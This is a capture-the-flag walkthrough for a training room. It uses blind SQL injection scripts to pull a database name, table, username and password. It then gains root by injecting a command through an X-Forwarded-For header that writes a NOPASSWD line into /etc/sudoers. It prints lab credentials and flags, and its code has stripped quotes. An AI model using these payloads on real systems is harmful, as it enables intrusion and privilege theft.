Room Link : https://tryhackme.com/r/room/kitty


STEP1
nmap -p- -sSV 10.10.76.67 -Pn -T4 -A
FINDING
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
-------------------------------------------------------------------------------------------------------------
STEP2
nano /etc/hosts
10.10.143.247  kitty.thm
ctrl+x
ctrl+y
enter
-------------------------------------------------------------------------------------------------------------
STEP2
http://kitty.thm/

http://kitty.thm/register.php

register
type (asad or 1=1-- -) on login username and submit
FINDING
SQL Injection detected. This incident will be logged!
-------------------------------------------------------------------------------------------------------------
STEP3
use python script to detect database name
**********************************************************
import requests

probe = +-{}(), abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_
url = http://kitty.thm/index.php

headers = {
	Host: kitty.thm,
	User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0,
	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8,
	Accept-Language: en-US,en;q=0.5,
	Accept-Encoding: gzip, deflate, br,
	Content-Type: application/x-www-form-urlencoded,
	Origin: http://kitty.thm,

	Connection: close,
	Referer: http://kitty.thm/index.php,

	Upgrade-Insecure-Requests: 1
}
result = 
while True:
	for elem in probe:
		query = " UNION SELECT 1,2,3,4 where database() like {sub}%;-- -".format(sub=result+elem)
		data = {
		    username: query,
		    password: 123456
		}
		response = requests.post(url, headers=headers, data=data,allow_redirects=True)
		#print("Size of Response Content:", len(response.content), "bytes")
		if(len(response.content) == 618):
			result += elem
			break
		if(elem == probe[-1]):
			print(\033[K)
			print(result)
			exit()
		if(elem != "\n"):
			print(result+elem,end=\r)
**********************************************************
python KittysqlGuessDb.py
FINDING
mywebsite -- db name
-------------------------------------------------------------------------------------------------------------
STEP4
use python script to detect table name
************************************************
import requests

probe = +-{}(), abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_
url = http://kitty.thm/index.php

headers = {
	Host: kitty.thm,
	User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0,
	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8,
	Accept-Language: en-US,en;q=0.5,
	Accept-Encoding: gzip, deflate, br,
	Content-Type: application/x-www-form-urlencoded,
	Origin: http://kitty.thm,

	Connection: close,
	Referer: http://kitty.thm/index.php,

	Upgrade-Insecure-Requests: 1
}
result = 
while True:
	for elem in probe:
		query = " UNION SELECT 1,2,3,4 FROM information_schema.tables WHERE table_schema = mywebsite and table_name like {sub}%;-- -".format(sub=result+elem)
		data = {
		    username: query,
		    password: 123456
		}
		response = requests.post(url, headers=headers, data=data,allow_redirects=True)
		#print("Size of Response Content:", len(response.content), "bytes")
		if(len(response.content) == 618):
			result += elem
			break
		if(elem == probe[-1]):
			print(\033[K)
			print(result)
			exit()
		if(elem != "\n"):
			print(result+elem,end=\r)
************************************************
python KittysqlGuessTbl.py
FINDING
siteusers -- tbl name
-------------------------------------------------------------------------------------------------------------
STEP5
use python script to detect user name
************************************************
import requests

probe = +-{}(), abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_
url = http://kitty.thm/index.php

headers = {
	Host: kitty.thm,
	User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0,
	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8,
	Accept-Language: en-US,en;q=0.5,
	Accept-Encoding: gzip, deflate, br,
	Content-Type: application/x-www-form-urlencoded,
	Origin: http://kitty.thm,

	Connection: close,
	Referer: http://kitty.thm/index.php,

	Upgrade-Insecure-Requests: 1
}
result = 
while True:
	for elem in probe:
		query = " UNION SELECT 1,2,3,4 from siteusers where username like {sub}% -- -".format(sub=result+elem)
		data = {
		    username: query,
		    password: 123456
		}
		response = requests.post(url, headers=headers, data=data,allow_redirects=True)
		#print("Size of Response Content:", len(response.content), "bytes")
		if(len(response.content) == 618):
			result += elem
			break
		if(elem == probe[-1]):
			print(\033[K)
			print(result)
			exit()
		if(elem != "\n"):
			print(result+elem,end=\r)
*************************************************
python KittysqlGuessUsrNm.py
FINDING
kitty -- user name
-------------------------------------------------------------------------------------------------------------
STEP6
use python script to detect password
************************************************
import requests

probe = +-{}(), abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_
url = http://kitty.thm/index.php

headers = {
	Host: kitty.thm,
	User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0,
	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8,
	Accept-Language: en-US,en;q=0.5,
	Accept-Encoding: gzip, deflate, br,
	Content-Type: application/x-www-form-urlencoded,
	Origin: http://kitty.thm,

	Connection: close,
	Referer: http://kitty.thm/index.php,

	Upgrade-Insecure-Requests: 1
}
result = 
while True:
	for elem in probe:
		query = " UNION SELECT 1,2,3,4 from siteusers where username = kitty and password like BINARY {sub}% -- -".format(sub=result+elem)
		data = {
		    username: query,
		    password: 123456
		}
		response = requests.post(url, headers=headers, data=data,allow_redirects=True)
		#print("Size of Response Content:", len(response.content), "bytes")
		if(len(response.content) == 618):
			result += elem
			break
		if(elem == probe[-1]):
			print(\033[K)
			print(result)
			exit()
		if(elem != "\n"):
			print(result+elem,end=\r)

*************************************************
python KittysqlGuessBinryPasswd.py 
FINDING
L0ng_liv3_KittY -- password
-------------------------------------------------------------------------------------------------------------
STEP7
ssh [email protected] -- with password L0ng_liv3_KittY
ls -la
cat user.txt
FINDING
What is the user flag?
THM{31e606998972c3c6baae67bab463b16a}
-------------------------------------------------------------------------------------------------------------
STEP8
cd /
ls -la
cd opt
ls -la
cat log_checker.sh
FINDING
#!/bin/sh
while read ip;
do
  /usr/bin/sh -c "echo $ip  /root/logged";
done  /var/www/development/logged
cat /dev/null  /var/www/development/logged
-------------------------------------------------------------------------------------------------------------
STEP9
cd /var/www/development/
ls -la
cat config.php
FINDING
/* Database credentials. Assuming you are running MySQL
server with default setting (user root with no password) */
define(DB_SERVER, localhost);
define(DB_USERNAME, kitty);
define(DB_PASSWORD, Sup3rAwesOm3Cat!);
define(DB_NAME, devsite);
-------------------------------------------------------------------------------------------------------------
STEP10
MySQL -u kitty -p
Sup3rAwesOm3Cat!
NOT USEABLE
-------------------------------------------------------------------------------------------------------------
STEP11
apache2ctl -S (we can display the current configuration settings of the Apache HTTP Server. We see an instance running on 127.0.0.1:8080 with a dev_site.conf. This seems to be our candidate.)
FINDING
127.0.0.1:8080         localhost (/etc/apache2/sites-enabled/dev_site.conf:2)
-------------------------------------------------------------------------------------------------------------
STEP12
curl 127.0.0.1:8080 -d "username=aaa or 1=1-- -&password=aaa" -H "X-Forwarded-For: test"
cat logged
test
FINDING
means we can echo any file with this command just instead of "test" we need to write out command
-------------------------------------------------------------------------------------------------------------
STEP13
curl 127.0.0.1:8080 -d "username=aaa or 1=1-- -&password=aaa" -H "X-Forwarded-For: \$(echo kitty ALL=(ALL:ALL) NOPASSWD:ALL  /etc/sudoers)"
sudo -l
enter kitty password -- L0ng_liv3_KittY
FINDING
User kitty may run the following commands on kitty:
    (ALL : ALL) NOPASSWD: ALL
-------------------------------------------------------------------------------------------------------------
STEP14
sudo su root
whoami
root
cd /root
ls -la
cat root.txt
FINDING
What is the root flag?
THM{581bfc26b53f2e167a05613eecf039bb}
-------------------------------------------------------------------------------------------------------------
                             

Related articles